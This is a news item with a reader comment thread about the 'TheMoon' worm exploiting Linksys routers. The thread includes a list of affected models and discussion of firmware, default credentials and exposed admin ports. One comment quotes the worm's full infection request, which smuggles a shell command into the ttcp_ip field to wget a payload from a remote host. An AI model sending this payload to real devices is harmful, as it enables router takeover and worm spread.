Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

That's impossible

[CajunArson]

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

In conclusion, Windows is the cause of all security problems.

Re: That's impossible

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re:That's impossible

[Narcocide]

Only affecting models not running Linux currently...

Network company supplied routers vul'n

[RichMan]

Use this supplied router. Do NOT modify it.

But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.

Do NOT modify the settings on the supplied router.

*facepalm*

Model Numbers of affected devices.

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re:Default firmware only?

[Lothsahn]

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

Actually Belkin bought them from Cisco

[fullmetal55]

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

It wasn't Trolling

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"

The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

TheMoon

[confused+one]

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

Why is the admin port open to the public?

[EMG+at+MU]

The web administration port should not be open to the public internet by default on these routers.

Re:Is dd-wrt affected?

[CreamyG31337]

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...